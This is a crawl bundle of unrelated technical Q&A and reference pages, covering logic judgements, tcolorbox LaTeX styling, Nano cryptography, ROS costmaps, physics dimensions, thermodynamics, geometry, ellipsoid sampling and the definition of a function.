For more about the precise relationship between the various meanings of $\vdash$ here, see natural deduction and logical framework.
While this may seem to be a very basic form of (hypothetical/generic) judgement only, in systems such as dependent type theory or homotopy type theory, all of logic and a good bit more is all based on just this.
## References
Foundational discussion of the notion of judgement in formal logic is in
• Per Martin-Löf, On the meaning of logical constants and the justifications of the logical laws, leture series in Siena (1983) (web)
More on this is in in sections 2 and 3 of
• Frank Pfenning, Rowan Davies, A judgemental reconstruction of modal logic (2000) (pdf)
A textbook acccount is in section I.3 of
Something called judgement (Urteil) appears in
Revised on January 14, 2014 14:02:53 by ottos mops? (77.179.64.87)
|
2015-05-29 00:12:58
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 40, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8740018606185913, "perplexity": 795.8295663981748}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-22/segments/1432207929803.61/warc/CC-MAIN-20150521113209-00043-ip-10-180-206-219.ec2.internal.warc.gz"}
|
https://tex.stackexchange.com/questions/408160/tcolorbox-with-curved-sides
|
# tcolorbox with curved sides
I would like to create using tcolorbox a filled breakable rectangle with all curved side such as one shown in the
I am not able to fill it correctly. If someone is willing to help, I would be grateful.
• We kindly suggest you to include a full minimal working example (MWE) to show what you have worked so far on, so we can help you further with this. – Cragfelt Dec 30 '17 at 10:06
• If Christian Hupfer's answer (below) solved your problem please mark it as accepted by clicking the check mark next to the answer. see: How does accepting an answer work? for more information. – Cragfelt Dec 30 '17 at 21:08
This can be achieved with layers and underlays.
The breakability is 'difficult' -- it is necessary to redraw the box bottoms and box bottoms depending on the position in the breaking sequence (in tcolorbox parlour: first, middle and last) -- this can be done with underlay first and underlay middle and last, and if the box is unbroken, use underlay unbroken.
The interior background of the real tcolorbox is not drawn at all, such that it does not paint over the following underlays.
The colors for the inner box and outer boxes can be changed by using new pgfkeys as done in \tcbset.
Please note that this might fail for the last box of a break sequence and produce hilarious results.
Now with broken boxes and the ability to change colours:
\documentclass{article}
\usepackage{blindtext}
\usepackage[most]{tcolorbox}
\usetikzlibrary{shapes.geometric,calc,backgrounds}
\newlength{\internalshift}
\setlength{\internalshift}{20pt}
\pgfdeclarelayer{background rounded rect}
\pgfsetlayers{background rounded rect,main}
\tcbset{%
innerboxcolback/.colorlet=tcbcol@innerback,
outerboxcolback/.colorlet=tcbcol@outerback,
outerboxcolframe/.colorlet=tcbcol@outerboxframe,
innerboxcolback=yellow,
outerboxcolback=cyan!20,
outerboxcolframe=blue,
}
\makeatletter
\newtcolorbox{curvedbox}[1][]{%
enhanced,
breakable,
colback=blue!20,
colframe=green,
innerboxcolback=yellow,
arc=\internalshift,
auto outer arc,
interior hidden,
frame hidden,
attach boxed title to top center,
boxed title style={colback=tcbcol@outerback,enhanced,frame hidden},
coltitle=black,
title={Title},
underlay={% Drawing the blue
\begin{pgfonlayer}{background rounded rect}
\draw[tcbcol@outerboxframe, line width=1.5pt, fill=tcbcol@outerback,rounded corners=1.5\internalshift] ($(frame.north west) + (0pt,1\internalshift)$) rectangle ($(frame.south east) - (0pt,\internalshift)$);
\draw[tcbcol@outerboxframe, line width=1.5pt,fill=tcbcol@outerback,rounded corners=1.5\internalshift] ($(frame.north west) - (0.5\internalshift,0.5\internalshift)$) rectangle ($(frame.south east) + (0.5\internalshift,0.5\internalshift)$);
\end{pgfonlayer}
},% End of underlay
% Now the yellow box underlay if the box is unbroken
underlay unbroken={\draw[tcbcol@frame, line width=1.5pt, fill=tcbcol@innerback,rounded corners=\kvtcb@arc] (frame.north west) rectangle (frame.south east);},
% Now the yellow box underlay if the box is broken, provide rounded rectangles for the first at the bottom and for the middle and last on the top.
underlay first={\draw[tcbcol@frame, line width=1.5pt, fill=tcbcol@innerback,rounded corners=\kvtcb@arc] (frame.north west) rectangle (frame.south east);},
underlay middle and last={\draw[tcbcol@frame, line width=1.5pt, fill=tcbcol@innerback,rounded corners=\kvtcb@arc] (frame.north west) rectangle (frame.south east);},
#1
}
\makeatother
\begin{document}
\begin{curvedbox}
\blindtext[10]
\end{curvedbox}
\end{document}
• Thanks for your answer. You saved me a lot of time. Thank you once – Zeljko Hrcek Dec 30 '17 at 20:26
|
2020-01-27 01:09:52
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5941154360771179, "perplexity": 3327.8859134322297}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251694071.63/warc/CC-MAIN-20200126230255-20200127020255-00260.warc.gz"}
|
https://docs.nano.org/protocol-design/signing-hashing-and-key-derivation/
|
Signing, Hashing and Key Derivation
Signing algorithm: ED25519¶
ED25519 is an elliptic curve algorithm developed in an academic setting with a focus on security from side channel attack, performance, and fixing a lot of the little annoyances in most elliptic curve systems1. However, it should be noted that instead of using SHA-512 in the key derivation function, Nano uses Blake2b.
Incorrect, SHA-512 has been used
0000000000000000000000000000000000000000000000000000000000000000 ->
3B6A27BCCEB6A42D62A3A8D02A6F0D73653215771DE243A63AC048A18B59DA29
Correct, Blake2b digested the seed
0000000000000000000000000000000000000000000000000000000000000000 ->
19D3D919475DEED4696B5D13018151D1AF88B2BD3BCFF048B45031C1F36D1858
Hashing algorithm: Blake2¶
Compared to existing cryptocurrencies, the hash algorithm chosen is much less important since it's not being used in a Proof-of-Work context. In Nano hashing is used purely as a digest algorithm against block contents. Blake2 is a highly optimized cryptographic hash function whose predecessor was a SHA3 finalist.2
Key derivation function: Argon2¶
The key derivation function of Argon2 is used for securing the account keys in the reference wallet. 3
|
2019-06-24 14:34:24
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7298770546913147, "perplexity": 4970.601027391628}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627999539.60/warc/CC-MAIN-20190624130856-20190624152856-00053.warc.gz"}
|
https://answers.ros.org/question/353187/nav-stack-costmap_2d-obstacle_layer-wrt-which-frame/
|
# Nav Stack Costmap_2d: obstacle_layer w.r.t. which frame
Hello there,
I have a few quetion regarding the obstacle_layer that is used in costmap_2d for the Navigation Stack. I am unsure about a few parameters like min_obstacle_height and max_obstacle_height. I understand the meaning of these two parameters. However, I really don't know w.r.t. which frame these heights shoult be specified. Is it w.r.t. /map, /odom or /base_link? The same question appears for the parameter "origin_z" in the VoxelCostmapPlugin.
In my example, I am using a robot whose base_link is 6 cm above ground. The /map frame (whose tf is published by AMCL I guess) is on the same height as base_link, although I set /odom to be fully on the ground meaning 6 cm below base_link in z-direction.
Can anyone tell me how the mentioned parameters work exactly? Also, does anyone know if the /map frame should be on the same z-height as /odom or if it's normal that mine appears on the same height as base_link?
edit retag close merge delete
Sort by » oldest newest most voted
The sensor data is transformed into the global frame of the costmap and then the obstacle height is checked. For a global costmap, this is usually map and for a local costmap this is often odom
more
|
2021-10-27 12:29:51
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.18447571992874146, "perplexity": 2796.0447170773346}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323588153.7/warc/CC-MAIN-20211027115745-20211027145745-00041.warc.gz"}
|
https://physics.stackexchange.com/questions/382275/what-is-fourth-dimension
|
# What is Fourth Dimension?
Before people get pissed at me for asking a question that has likely been asked more than a few times, I just want to know a simple answer, if first dimension is that an object exists, (collision) Second dimension is flat, (that there is color and reflection to it) and 3rd dimension is depth, would fourth dimension be perception of time, or simply perspective (seeing at a specific angle) or can it be both?
• This is as much a question of philosophy as physics. From a simplistic point of view, time is the 4th dimension, as it fits a lot of fairly simple equations in physics. But there are both mystical and eerie quantum-mechanical hypotheses of additional dimensions. – Hot Licks Jan 25 '18 at 20:29
• So in other words, we can guess, but we don't know for sure? If that's the case then I've already broken the rules! x3 – Konix25 Jan 25 '18 at 20:34
• The "fourth dimension" in relativity is "time", but it is a measure of relative simultaneity - it is not the same thing as "change", which appears to be a much more complex derived concept involving at least a 3-way relation. – Steve Jan 25 '18 at 23:27
Dimensions in physics generally means degrees of freedom. That is how many different directions can you move something.
For example on a straight line you can move back and forth in one direction, so we say the line has just one dimension. The same is true for a curve.
On a table-top we can move in two independent directions so we say that this is 2d. The same is true for the surface of a sphere.
In space, we can move in three different directions, so we say that it is 3d.
Sometimes time is said to be the 4th dimension, but note we can only move along it in just one direction and the way we move is fixed; so in this sense, it's not really a dimension.
Mathematically, all of the above is modelled by the notion of a manifold, which we say is of dimension n when locally we can always move in n different dimensions.
Despite what I said about time, usually spacetime, after Einstein and especially after Minkowski, we model spacetime as a 4d manifold.
• "Different directions" is not quite the right way to say it. I can slide an object on a table top in an infinite number of different directions. But if you ask me where the object is on the table top, there is no way I can assign a single unique number to each distinct location. I have to report two numbers to tell you where the object is. And in free space, I have to report three numbers. – Solomon Slow Jan 25 '18 at 21:31
• @jameslarge: sure, thats why I said 'independent directions'. I didn't emphasise it. There's more to dimension that just 'three numbers' - if I had a bag with apples, oranges and pears I could assign a triple of numbers to the bag that tells me how many of each they are; and if I put two bags together then I get an addition law. But this example is far from what we mean by dimension, at least geometrically. – Mozibur Ullah Jan 25 '18 at 21:32
• "there is no way I can assign a single unique number to each distinct location" - Technically you can, since $\mathbb{R}$ is equipollent to $\mathbb{R}^n$ for any positive integer $n$. However, there's no point-to-real-number assignment that satisfies some nice properties familiar to differential geometers. – J.G. Jan 25 '18 at 21:36
Let's say someone invites you to a party in their apartment. You need to know how far to go North to get there, and how far East, and how many floors up, which covers the three dimensions of space. But you also need to know when the party is.
• Wouldn't this also include when "now" is? So this would add perspective in. Which that would mean both perspective and time are variables in the fourth dimension. Thanks for the explanation, makes things a lot easier on my tiny brain! :) – Konix25 Jan 25 '18 at 20:44
• @Konix25 If the invitation says that the party starts at 7:30pm, then it starts at 7:30pm. The start time won't change depending on whether I read the invitation at noon or at 6:42. What does matter though, is that to correctly understand what "7:30pm" means, I have to know in what time zone the "7:30" is based. Mathematically speaking, I have to know the origin of the coordinate system. – Solomon Slow Jan 25 '18 at 21:36
Yours isn't a physics question. Since this is a physics forum however I'll answer in physics terms.
In physics, one dimension means a straight line. You only need one coordinate to specify it - for example with the horizontal axis, you only need to know how many units a point is before or after the origin to know where it is. Two dimensions is a plane. In the x-y plane, you need to know both the x-coordinate and the y-coordinate to know unambiguously where a point is. Three dimensions is the world we're familiar with. You not only need to know the x-coordinate and the y-coordinate, you also need to know how high a point is above the plane.
Time is the 4th dimension in Relativity, and it's related to the other three dimensions but has a minus sign. In Minkowski space (Special Relativity), the metric is:
$ds^2 = -dt^2 + dx^2 + dy^2 + dz^2$
Here $t$ is time, and $x, y, z$ are spatial coordinates. If you don't recognize this formula don't worry about it, but the point is that these things are being added. This isn't always possible - adding time to energy for example makes no sense. The fact that we can add these means that we can treat time and space on an equal footing. However they're also not equivalent - there's a minus sign between the two that no sleight-of-hand could ever conjure away.
There're ongoing searches for more spatial dimensions, and some theories such as string theory predict there are 10 spatial dimensions, but nothing has been found yet.
• Your physics terms are much appreciated, I don't mind what kind of response it is as long as it betters my understanding of the idea behind a fourth dimension. Thank you <3 – Konix25 Jan 29 '18 at 22:50
|
2019-09-22 22:32:53
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6279303431510925, "perplexity": 315.13450373275947}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514575751.84/warc/CC-MAIN-20190922221623-20190923003623-00031.warc.gz"}
|
https://www.physicsforums.com/threads/a-problem-from-thermodynamics-freezing-of-water-at-273-k-and-1-atm.869195/
|
A problem from thermodynamics -- Freezing of water at 273 K and 1 atm
Homework Statement
Freezing of water at 273 K and 1 atm
which of the following is true for the above thermodynamics process
p) q=0
q)w=0
r)ΔSsys<0
s)ΔU=0
t)ΔG=0
none[/B]
The Attempt at a Solution
[/B]
i got r, s ,t
since the reaction happens at constant temperature,internal energy is constant
since the reaction is open so it is isobaric in nature and since the volume changes due to phase change,so work done is not zero,so heat must be exchanged(first law of thermodynamics).
randomness decreases so ΔSsys<0
but answer given is r t q
Andrew Mason
Homework Helper
Homework Statement
i got r, s ,t
since the reaction happens at constant temperature,internal energy is constant
since the reaction is open so it is isobaric in nature and since the volume changes due to phase change,so work done is not zero,so heat must be exchanged(first law of thermodynamics).
randomness decreases so ΔSsys<0
but answer given is r t q
##\Delta U## includes potential energy. In order to form ice, the water molecules lose potential energy and rotational kinetic energy. Average translational kinetic energy does not change (i.e. temperature) but average potential energy per molecule decreases and there is loss of rotational kinetic energy. The process is exothermic (heat flows out of the water to form ice).
Since ##\Delta Q < 0##, ##\Delta S = \int dQ/T = \Delta Q/T < 0##.
Since P and T are constant, ##\Delta G = \Delta Q - T\Delta S = T\Delta S - T\Delta S = 0##
I am not sure about w = 0, however. Ice takes up more volume than liquid water (which is why ice floats). So there is a small amount of work done on the surroundings.
[later edits are in italics]
AM
Last edited:
##\Delta U## includes potential energy. In order to form ice, the water molecules lose potential energy. Average kinetic energy does not change (i.e. temperature) but average potential energy per molecule decreases. The process is exothermic (heat flows out of the water to form ice).
Since ##\Delta Q < 0##, ##\Delta S = \int dQ/T = \Delta Q/T < 0##.
Since P and T are constant, ##\Delta G = \Delta Q - T\Delta S = T\Delta S - T\Delta S = 0##
I am not sure about w = 0, however. Ice takes up more volume than liquid water (which is why ice floats). So there is a small amount of work done on the surroundings.
AM
thank you very much sir,understood it.
Andrew Mason
|
2021-04-13 22:39:12
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8210896253585815, "perplexity": 1466.2936006714283}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038075074.29/warc/CC-MAIN-20210413213655-20210414003655-00140.warc.gz"}
|
https://www.gradesaver.com/textbooks/math/geometry/geometry-common-core-15th-edition/chapter-6-polygons-and-quadrilaterals-6-3-proving-that-a-quadrilateral-is-a-parallelogram-practice-and-problem-solving-exercises-page-372/12
|
Geometry: Common Core (15th Edition)
$x = 13$
In a parallelogram, opposite angles are congruent. Let us set opposite angles equal to one another to solve for $x$: $x + 38 = 4x - 1$ Subtract $38$ from each side of the equation to isolate constants on one side of the equation: $x = 4x - 39$ Subtract $4x$ from each side of the equation to isolate the variable on one side of the equation: $-3x = -39$ Divide each side of the equation by $-3$ to solve for $x$: $x = 13$
|
2022-05-28 08:23:15
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6685868501663208, "perplexity": 75.31775726434174}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652663013003.96/warc/CC-MAIN-20220528062047-20220528092047-00289.warc.gz"}
|
https://math.stackexchange.com/questions/973101/how-to-generate-points-uniformly-distributed-on-the-surface-of-an-ellipsoid
|
# How to generate points uniformly distributed on the surface of an ellipsoid?
I am trying to find a way to generate random points uniformly distributed on the surface of an ellipsoid.
If it was a sphere there is a neat way of doing it: Generate three $N(0,1)$ variables $\{x_1,x_2,x_3\}$, calculate the distance from the origin
$$d=\sqrt{x_1^2+x_2^2+x_3^2}$$
and calculate the point
$$\mathbf{y}=(x_1,x_2,x_3)/d.$$
It can then be shown that the points $\mathbf{y}$ lie on the surface of the sphere and are uniformly distributed on the sphere surface, and the argument that proves it is just one word, "isotropy". No prefered direction.
Suppose now we have an ellipsoid
$$\frac{x_1^2}{a^2}+\frac{x_2^2}{b^2}+\frac{x_3^2}{c^2}=1$$
How about generating three $N(0,1)$ variables as above, calculate
$$d=\sqrt{\frac{x_1^2}{a^2}+\frac{x_2^2}{b^2}+\frac{x_3^2}{c^2}}$$
and then using $\mathbf{y}=(x_1,x_2,x_3)/d$ as above. That way we get points guaranteed on the surface of the ellipsoid but will they be uniformly distributed? How can we check that?
Any help greatly appreciated, thanks.
PS I am looking for a solution without accepting/rejecting points, which is kind of trivial.
EDIT:
Switching to polar coordinates, the surface element is $dS=F(\theta,\phi)\ d\theta\ d\phi$ where $F$ is expressed as $$\frac{1}{4} \sqrt{r^2 \left(16 \sin ^2(\theta ) \left(a^2 \sin ^2(\phi )+b^2 \cos ^2(\phi )+c^2\right)+16 \cos ^2(\theta ) \left(a^2 \cos ^2(\phi )+b^2 \sin ^2(\phi )\right)-r^2 \left(a^2-b^2\right)^2 \sin ^2(2 \theta ) \sin ^2(2 \phi )\right)}$$
• I might have the wrong idea... you could generate a set of points uniformly on the sphere $\mathbb{S}^{2} \subset \mathbb{R}^{3}$. Let $\left\{ c_{1},\ldots,c_{N} \right\}$ be this set of points. Then the mapping $\displaystyle \begin{bmatrix} x \\ y \\ z \end{bmatrix} \, \longmapsto \, \begin{bmatrix} ax \\ by \\ cz \end{bmatrix}$ maps a point $c_{i}$ on the sphere to a point on the ellipsoid. – jibounet Oct 20 '14 at 12:55
• @jibounet Your solution would transform a uniform distribution over the ball volume into a uniform distribution over the elipsoid volume, however on surfaces it will fail. Consider very, very long cigar-like elipsoid ($a\gg b = c = 1$) - the density at the cigar's tip ($x\approx \pm a$) will be close to that of the unit sphere, but the density at $x\approx 0$ will decrease as $1/a$ relative to that on the sphere. – CiaPan Oct 20 '14 at 13:16
• Hm... the sphere can be parametrized as $\mathbf{F}(u,v),$ polar coordinates or whatever and the surface element can be calculated using the first fundamental form as $dS^2=H(u,v)\ du\ dv$. How would that transform under your diagonal transformation? If it's something simpler we are getting close! – Georgy Oct 20 '14 at 13:18
• @CiaPan : You're right. I guess we could use the same method as here : mathworld.wolfram.com/SpherePointPicking.html with the parametrization of the ellipsoid instead on the parametrization of the sphere, right ? – jibounet Oct 20 '14 at 13:21
• @jibounet: I don't think this calc can go through because in the case of the sphere the surface element is proportional to the solid angle element which is not the case for the ellipsoid. – Georgy Oct 20 '14 at 13:30
One way to proceed is to generate a point uniformly on the sphere, apply the mapping $f : (x,y,z) \mapsto (x'=ax,y'=by,z'=cz)$ and then correct the distortion created by the map by discarding the point randomly with some probability $p(x,y,z)$ (after discarding you restart the whole thing).
When we apply $f$, a small area $dS$ around some point $P(x,y,z)$ will become a small area $dS'$ around $P'(x',y',z')$, and we need to compute the multiplicative factor $\mu_P = dS'/dS$.
I need two tangent vectors around $P(x,y,z)$, so I will pick $v_1 = (dx = y, dy = -x, dz = 0)$ and $v_2 = (dx = z,dy = 0, dz=-x)$
We have $dx' = adx, dy'=bdy, dz'=cdz$ ; $Tf(v_1) = (dx' = adx = ay = ay'/b, dy' = bdy = -bx = -bx'/a,dz' = 0)$, and similarly $Tf(v_2) = (dx' = az'/c,dy' = 0,dz' = -cx'/a)$
(we can do a sanity check and compute $x'dx'/a^2+ y'dy'/b^2+z'dz'/c^2 = 0$ in both cases)
Now, $dS = v_1 \wedge v_2 = (y e_x - xe_y) \wedge (ze_x-xe_z) = x(y e_z \wedge e_x + ze_x \wedge e_y + x e_y \wedge e_z)$ so $|| dS || = |x|\sqrt{x^2+y^2+z^2} = |x|$
And $dS' = (Tf \wedge Tf)(dS) = ((ay'/b) e_x - (bx'/a) e_y) \wedge ((az'/c) e_x-(cx'/a) e_z) = (x'/a)((acy'/b) e_z \wedge e_x + (abz'/c) e_x \wedge e_y + (bcx'/a) e_y \wedge e_z)$
And finally $\mu_{(x,y,z)} = ||dS'||/||dS|| = \sqrt{(acy)^2 + (abz)^2 + (bcx)^2}$.
It's quick to check that when $(x,y,z)$ is on the sphere the extrema of this expression can only happen at one of the six "poles" ($(0,0,\pm 1), \ldots$). If we suppose $0 < a < b < c$, its minimum is at $(0,0,\pm 1)$ (where the area is multiplied by $ab$) and the maximum is at $(\pm 1,0,0)$ (where the area is multiplied by $\mu_{\max} = bc$)
The smaller the multiplication factor is, the more we have to remove points, so after choosing a point $(x,y,z)$ uniformly on the sphere and applying $f$, we have to keep the point $(x',y',z')$ with probability $\mu_{(x,y,z)}/\mu_{\max}$.
Doing so should give you points uniformly distributed on the ellipsoid.
• If e.g. $b>>a$ and $c>>a$, we only keep a small fraction of points generated. I was originally hoping to come up with a solution without rejecting points, but now it seems an impossible task. And from all methods presented so far your's is the most simple and direct. – Georgy Oct 21 '14 at 10:31
• A direct method would need to compute the function $x \mapsto$area to the left of the $X=x$ plane, and then invert that function. I haven't checked at all if either step is easy or not (I would guess they are not) – mercio Oct 21 '14 at 10:41
• I have looked into that and it comes down to inverting a function that involves elliptic functions, so it can only be done numerically by some root finding procedure. – Georgy Oct 21 '14 at 12:32
• One other thing is your choice of $v_1$ and $v_2$. They are not orthogonal (do they have to be?) and not unit vectors. They are just two vectors in the tangent plane. So in the cross product you get the direction right but what about the magnitude? That depends also on the angle between them. If you had chosen another set of vectors spanning the tangent plane we 'd have a different result, no ? – Georgy Oct 21 '14 at 12:43
• @CookieMaster It is called a wedge product, or exterior product. The important computation rule is $a \wedge b = - b \wedge a$. And then you still use the euclidean norm, except that now you have $n(n-1)/2$ coordinates to sum. I would expect that the probability in the end still is (smallest axis)/(largest axis) but I could be wrong – mercio Feb 1 '18 at 17:20
Not sure if this is the same answer as @jibounet, but what if you use the normal distribution method, as you propose, but use the respective radii as the variances and then scale using the d, as proposed. Empirically this does not look more bunched (at least to me) at "cigar poles" than a brute force selection from uniform distributed points in $\mathbb{R}^3$.
So, the method is generate random variables:
$$x_1 \sim N(0,a^2)$$ $$x_2 \sim N(0,b^2)$$ $$x_3 \sim N(0,c^2)$$
Then the rest is as suggested:
$$d=\sqrt{\frac{x_1^2}{a^2}+\frac{x_2^2}{b^2}+\frac{x_3^2}{c^2}}$$
and use points $\mathbf{y}=(x_1,x_2,x_3)/d$
The proof of the original spherical selection is simply that normal distributions are radially symmetric? Does that not still apply with unequal variances?
• I agree that it does not look clustered – Makogan Mar 15 '18 at 22:36
Idea for an approximate solution: divide the ellipsoid in small enough, flat enough quasi-rectangles $P_i$, choose an almost-area-preserving parametrization of each piece: $$f_i:R_i\longrightarrow P_i$$ with $R_i\subset\Bbb R^2$ a rectangle. Choose randomly an index $j$ with probability $\text{area}(R_j)/\sum_i\text{area}(R_i)$, choose a point in $R_j$ and finally apply $f_j$.
|
2020-04-01 18:33:58
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8424872159957886, "perplexity": 220.54200660962832}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370505826.39/warc/CC-MAIN-20200401161832-20200401191832-00003.warc.gz"}
|
https://www.houseofmath.com/drill/functions/what-is-a-function
|
# What Is a Function?
A function tells you the relationship between two variables. You can look at a function as a number machine. You put a number into the function, and you get another one in return. You can specify a function in three different ways: As an expression, as table and as a graph.
An example of a function is
$y=x+2$
Here, $x$ is a number of your own choosing. That’s why $x$ is known as the independent variable. For each number you choose $x$ to be, $y$ becomes a different number. That’s why $y$ is called the dependent variable, and we say that $y$ is dependent on $x$. The definition of a function is that for each value of $x$, there’s only one value of $y$.
It’s also common to give the functions their own names. Because the word “function” begins with the letter “$f$”, you typically call your first function $f$. Directly after the name, we write the independent variable in parentheses. Since you’re mostly working with functions that are dependent on $x$, we set the function’s name to be $f\left(x\right)$ (which is read as “$f$ of $x$”). If there are several functions in the same exercise, each of them gets their own name. We have already used $f$, so we skip to the next letter in the alphabet and call the next function $g\left(x\right)$, and the next one $h\left(x\right)$, and so on. We can therefore write the function above as
$f\left(x\right)=x+2$
|
2022-12-04 12:23:10
|
